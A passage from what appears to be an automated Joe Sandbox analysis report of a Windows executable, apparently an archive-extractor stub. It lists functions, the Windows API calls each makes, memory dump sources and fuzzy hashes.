                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
                                                                                          • Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
                                                                                          • Opcode Fuzzy Hash: 2e4afd72fc82be199d24eeb7757ecefb9c7c3cd13b63fcd150a9a2db747c9fc0
                                                                                          • Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C799
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
                                                                                          • Instruction ID: 50cec48405f5031c267507c4f1bec9fcfedb8f97deed5a77d7ae40740af1a4fb
                                                                                          • Opcode Fuzzy Hash: 90a426a2e18198e816775c6c5c51d97917f9256b174ba54c09290d10bf454bc0
                                                                                          • Instruction Fuzzy Hash: 86A011E22A800ABC3088B2082C02C3B020CF0C2B28330880EF802C0288A8E80CA88232
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
                                                                                          • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                                                                          • Opcode Fuzzy Hash: 96ed7d873b7cc10e3199be2bc1ef905cd4b25e83bccae8dcc1408f956f984024
                                                                                          • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
                                                                                          • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                                                                          • Opcode Fuzzy Hash: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
                                                                                          • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
                                                                                          • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                                                                          • Opcode Fuzzy Hash: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
                                                                                          • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                                                                          APIs
                                                                                          • SetEndOfFile.KERNELBASE(?,00878EDB,?,?,-00001954), ref: 00879B6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File
                                                                                          • String ID:
                                                                                          • API String ID: 749574446-0
                                                                                          • Opcode ID: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
                                                                                          • Instruction ID: f521cf5c77402baa3b6b8c9770714fda0e584112cbf776dce5c2994af4d47d67
                                                                                          • Opcode Fuzzy Hash: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
                                                                                          • Instruction Fuzzy Hash: A5B011300E080A8A8E002B30CC088203A20EA2230A30082A0A00AC80A0CB23C002AA00
                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,0088927A,008B2120,00000000,008B3122,00000006), ref: 00889027
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID:
                                                                                          • API String ID: 1611563598-0
                                                                                          • Opcode ID: d465cc1e351a3c7693c6a794f2e251fac87e6da8906c1e76158c7b030de61bd2
                                                                                          • Instruction ID: 2e5b367e9721ac19de958df0c8e2c58b6687c0a96baae27a125d92ea19e633e0
                                                                                          • Opcode Fuzzy Hash: d465cc1e351a3c7693c6a794f2e251fac87e6da8906c1e76158c7b030de61bd2
                                                                                          • Instruction Fuzzy Hash: 44A0123019410646CA400B30CC09C157650A761702F0086207002C00A0CB30C810E901
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,00879473), ref: 008794BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
                                                                                          • Instruction ID: b2f77f05bb1acf0dfa511571dfea2069e4bdbe2aef0426e592e83f108770fdc5
                                                                                          • Opcode Fuzzy Hash: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
                                                                                          • Instruction Fuzzy Hash: DAF0B430142B044EDB308A24954879177E8FB12732F04C71ED0EA838E4D361E44A8B11
                                                                                          APIs
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088A5C8
                                                                                          • EndDialog.USER32(?,00000006), ref: 0088A5DB
                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 0088A5F7
                                                                                          • SetFocus.USER32(00000000), ref: 0088A5FE
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088A63E
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088A671
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0088A687
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088A6A5
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A6B5
                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A6D2
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A6F0
                                                                                            • Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
                                                                                            • Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D
                                                                                          • _swprintf.LIBCMT ref: 0088A720
                                                                                            • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088A733
                                                                                          • FindClose.KERNEL32(00000000), ref: 0088A736
                                                                                          • _swprintf.LIBCMT ref: 0088A791
                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088A7A4
                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088A7BA
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088A7DA
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A7EA
                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A804
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A81C
                                                                                          • _swprintf.LIBCMT ref: 0088A84D
                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088A860
                                                                                          • _swprintf.LIBCMT ref: 0088A8B0
                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088A8C3
                                                                                            • Part of subcall function 0088932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
                                                                                            • Part of subcall function 0088932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                          • API String ID: 3227067027-1840816070
                                                                                          • Opcode ID: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
                                                                                          • Instruction ID: 4fbee63d22c6f6c453deb900bb87961b7278c7fd3fe11d65f1ad4e3fa5e38800
                                                                                          • Opcode Fuzzy Hash: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
                                                                                          • Instruction Fuzzy Hash: A8919172648308BBE621EBA4CC49FFB77ACFB4A704F044819F649D2581D775AA058B63
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00877075
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008771D5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008771E5
                                                                                            • Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
                                                                                            • Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
                                                                                            • Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008771F0
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008772FE
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0087732A
                                                                                          • CloseHandle.KERNEL32(?), ref: 0087733C
                                                                                          • GetLastError.KERNEL32(00000015,00000000,?), ref: 0087734C
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00877398
                                                                                          • DeleteFileW.KERNEL32(?), ref: 008773C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                          • API String ID: 3935142422-3508440684
                                                                                          • Opcode ID: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
                                                                                          • Instruction ID: fa2ebe81dd2047baa2ab24ccaefbbacc3483fb3e552427a0478baecc214c1801
                                                                                          • Opcode Fuzzy Hash: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
                                                                                          • Instruction Fuzzy Hash: 53B1BF719042189BEF20EF68CC45BEE77A8FF09304F548569F919E7246D730EA45CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog_memcmp
                                                                                          • String ID: CMT$h%u$hc%u
                                                                                          • API String ID: 3004599000-3282847064
                                                                                          • Opcode ID: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
                                                                                          • Instruction ID: 5ec32abf3472af3ced660e34b7bc1e881620433819e44102e569d94feecc1f8d
                                                                                          • Opcode Fuzzy Hash: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
                                                                                          • Instruction Fuzzy Hash: 423281715142849BDB14DF68C886AE93BA5FF15304F04847DFD8ECB28ADB70DA48CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
                                                                                          • Instruction ID: 387ff932066e0697a6c324e9abb84b4f1d1ac066bf2d47edd8dc298121bf27d1
                                                                                          • Opcode Fuzzy Hash: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
                                                                                          • Instruction Fuzzy Hash: D6C21871E046288FDF29EE68DD407A9B7B5FB84305F1941AAD44EE7240E774AE818F81
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00872775
                                                                                          • _strlen.LIBCMT ref: 00872CFF
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872E56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3741668355-2756464174
                                                                                          • Opcode ID: bce8539d22f641c613a3f9ac72deb529e69ed572445158d15f2e251b420ac59e
                                                                                          • Instruction ID: c073e6238f50eca233a3c9e36f3f34402bc2b21e56e29dfa618f5ce8c4af28ab
                                                                                          • Opcode Fuzzy Hash: bce8539d22f641c613a3f9ac72deb529e69ed572445158d15f2e251b420ac59e
                                                                                          • Instruction Fuzzy Hash: 0B62BF715002848EDB29DF68C8856EA3BE1FF54304F08857EEC9ECB28ADB71D945CB61
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00895C4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00895C55
                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00895C62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
                                                                                          • Instruction ID: 42c404d2bb9a4e6448cd3fb13050b9ddd1ad56a41c2d4af707ca62fc1352ee22
                                                                                          • Opcode Fuzzy Hash: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
                                                                                          • Instruction Fuzzy Hash: 2A319375901328ABCB21EF68D989BDDBBB8FF18710F5041DAE41CA7290E7709B858F45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                          • Instruction ID: e899d455b301ae6bf441024110f5efb286fc4e1b46166772e35783c822168383
                                                                                          • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                          • Instruction Fuzzy Hash: 01021D71E002199FDF18DFA9C8806ADB7F5FF88314F29826AD919E7344D731A9418B91
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                          • String ID:
                                                                                          • API String ID: 2169056816-0
